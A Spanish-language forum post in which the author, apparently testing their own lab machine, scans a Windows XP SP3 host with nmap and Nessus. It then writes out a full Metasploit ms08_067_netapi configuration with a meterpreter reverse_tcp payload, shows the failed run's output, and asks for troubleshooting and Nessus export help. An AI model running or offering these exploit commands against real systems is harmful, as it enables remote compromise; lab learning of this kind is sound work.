Buenas, usando nmap contra un XP SP3, con firewall activado y eset nod32 4.2, me dice que estan filtrados los puertos en cuestion.
Hago trampas
y desactivo un rato el firewall, mientras nessus hace el scaneo.
Me saca varias vulnerabilidades, una en concreto alta, pero a la hora de montar todo con el meta me tira esto :O
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.1.34
set LHOST 192.168.1.33
set SMBPIPE srvsvc
set EXITFUNC thread
set target 45
exploit
Resultado:
- Started reverse handler on 192.168.1.33:4444
[-] Exploit exception: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
- Exploit completed, but no session was created.
Y al usar como payload:
windows/vncinject/reverse_tcp
Me dice que expiró el tiempo [con el firewall activado] y el mismo error sin el firewall.
_________________________________________________________________________
PD: Tengo el scan hecho por nessus y para que no meta la pata con que exploit utilizar he creado una db, lo tengo todo apunto excepto lo mas importante y esque el nessus no me genera los
.neb solo me genera .nessus, .nessus (v1) y html ¿Como hago para que me saque los necesarios .neb? ¿puedo pasar cualquiera de los tres formatos que me deja a .neb?...
Si a alguien se le ocurre algo estoy por aqui un rato
Saludos